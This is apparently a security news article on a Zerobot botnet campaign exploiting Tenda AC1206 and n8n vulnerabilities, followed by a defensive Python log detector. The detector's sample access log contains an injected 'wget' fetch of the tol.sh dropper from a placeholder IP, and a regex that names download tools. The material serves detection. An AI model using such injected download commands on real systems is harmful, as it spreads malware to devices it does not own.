Cybersecurity researchers have identified a recent surge in malware activity that points to a renewed campaign by Zerobot, a Mirai-based botnet. The campaign specifically targets vulnerabilities in Tenda AC1206 routers and the n8n workflow automation platform.
Exploitation of Tenda and n8n Vulnerabilities
Now in its ninth iteration, zerobotv9, the botnet exploits newly disclosed command injection vulnerabilities to infiltrate exposed networks and devices. Zerobot first appeared in 2022 as Go-based malware targeting IoT devices. Its latest version diverges from its predecessor: it has a smaller, UPX-packed footprint, uses encrypted strings, and carries a hard-coded command-and-control (C2) domain.
Research conducted by Akamai has identified active exploitation attempts of these vulnerabilities, captured through their global honeypot network since mid-January 2026. These attempts mark the first confirmed exploitation of these specific CVEs since their disclosure in 2025.
Details of the Vulnerabilities
The key vulnerabilities exploited are CVE-2025-7544, a critical stack-based buffer overflow in Tenda AC1206 devices, and CVE-2025-68613, a critical remote code execution (RCE) flaw in n8n’s workflow system. The Tenda vulnerability, caused by improper handling of the deviceList parameter, allows both denial of service and remote code execution. The n8n flaw stems from insufficient sandboxing, which lets attackers execute arbitrary code and access sensitive data.
This campaign’s focus on n8n, alongside traditional IoT hardware, raises significant concerns due to n8n’s role in connecting databases and managing critical systems. A successful breach could facilitate lateral movement within an organization’s infrastructure.
Infection and Defense Strategies
Upon identifying a vulnerable device, Zerobot executes its exploit, forcing the device to download a malicious shell script, tol.sh, from a specific IP address. The script installs the main Zerobot payload, which is built for multiple CPU architectures, in keeping with Mirai’s design goal of infecting a broad range of devices.
The malware employs user-agent strings to evade detection and supports advanced attack methods, surpassing the capabilities of its earlier variants. Additionally, Zerobot targets other known vulnerabilities, employing fallback connection techniques to maintain resilience.
Organizations are urged to update Tenda firmware and n8n to patched versions to mitigate the risk. Network defenders should monitor for and block the identified malicious IPs and the C2 domain, and apply Akamai’s detection rules for proactive threat management.
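The infection chain and the monitoring advice above translate naturally into log-based detection. The following Python script is an added example written for this article; it is not Akamai’s detection rules and not code from the campaign or from any vendor. It assumes three things that the article does not state: that the deviceList parameter arrives as an HTTP query parameter and is visible in a standard combined-format web access log, that DNS queries are available in a simple timestamp/client/type/name log, and that the dropper IP and C2 domain are known indicators. The IP, domain and length threshold in the script are constructed placeholders, as are the sample log lines; substitute the indicators published by Akamai before use.

```python
"""Log-based detector for the Zerobot v9 activity described above.

Added example (not Akamai's rules, not the article's code). All indicator
values and log lines below are constructed placeholders.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed placeholders, NOT real indicators: replace with published IOCs.
DROPPER_IPS = {"203.0.113.10"}      # host serving tol.sh (TEST-NET-3 address)
C2_DOMAIN = "c2.example.invalid"    # stand-in for the hard-coded C2 domain
DEVICELIST_MAX_LEN = 128            # assumed sane upper bound for deviceList

# Apache/nginx "combined" access-log line.
ACCESS_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)
# A download tool followed somewhere later by the dropper name tol.sh.
DROPPER_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b.*\btol\.sh\b", re.I)
# Assumed DNS query log: "<timestamp> <client> <qtype> <qname>".
DNS_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) (?P<qtype>[A-Z]+) (?P<qname>\S+)$")


def analyze_access_line(line):
    """Return a list of (rule, detail) findings for one access-log line."""
    m = ACCESS_RE.match(line)
    if not m:
        # Surface unreadable lines so format drift cannot silently blind the rule.
        return [("unparsed", line.strip()[:80])]
    findings = []
    src = m.group("src")
    target = unquote(m.group("target"))  # decode %20 etc. before matching
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    # Overflow precondition: deviceList far longer than any legitimate value.
    for value in query.get("deviceList", []):
        if len(value) > DEVICELIST_MAX_LEN:
            findings.append(("oversized_deviceList", f"{src} sent {len(value)} bytes"))
    # Dropper fetch smuggled into the request.
    if DROPPER_RE.search(target):
        findings.append(("tol_sh_download_attempt", f"{src} {m.group('method')} {target[:80]}"))
    # Known dropper host referenced anywhere in the request (whole-IP match only).
    for ip in DROPPER_IPS:
        if re.search(r"(?<![\d.])" + re.escape(ip) + r"(?![\d.])", target):
            findings.append(("known_dropper_ip_referenced", f"{src} referenced {ip}"))
    return findings


def analyze_dns_line(line):
    """Flag lookups of the C2 domain or any of its subdomains."""
    m = DNS_RE.match(line)
    if not m:
        return [("unparsed", line.strip()[:80])]
    qname = m.group("qname").rstrip(".").lower()
    if qname == C2_DOMAIN or qname.endswith("." + C2_DOMAIN):
        return [("c2_domain_lookup", f"{m.group('client')} queried {qname}")]
    return []


def scan(access_lines, dns_lines):
    """Run both analyzers and return all findings in input order."""
    findings = []
    for line in access_lines:
        findings.extend(analyze_access_line(line))
    for line in dns_lines:
        findings.extend(analyze_dns_line(line))
    return findings


# Constructed sample logs (not captured traffic). Payload bytes are replaced by "A".
SAMPLE_ACCESS = [
    '10.0.0.7 - - [20/Jan/2026:10:00:01 +0000] "GET /api/device?deviceList=lan1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [20/Jan/2026:10:00:05 +0000] "POST /api/device?deviceList='
    + "A" * 600 + ' HTTP/1.1" 500 0 "-" "-"',
    '198.51.100.23 - - [20/Jan/2026:10:00:06 +0000] "GET /api/device?deviceList=lan1&cmd=wget%20http://203.0.113.10/tol.sh HTTP/1.1" 404 0 "-" "-"',
]
SAMPLE_DNS = [
    "2026-01-20T10:00:07Z 10.0.0.7 A www.example.com",
    "2026-01-20T10:00:09Z 10.0.0.42 A c2.example.invalid.",
]

if __name__ == "__main__":
    for rule, detail in scan(SAMPLE_ACCESS, SAMPLE_DNS):
        print(f"[{rule}] {detail}")
```

Run against the constructed samples, the script reports the oversized deviceList request, the tol.sh fetch and its placeholder dropper IP, and the C2 lookup, while the benign management request produces nothing. The length threshold is the weakest rule and will need tuning per deployment; the dropper-name and indicator matches are the ones to alert on first.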
For continuous updates on this evolving threat, follow our coverage and ensure your network defenses are robust against such sophisticated cyber threats.
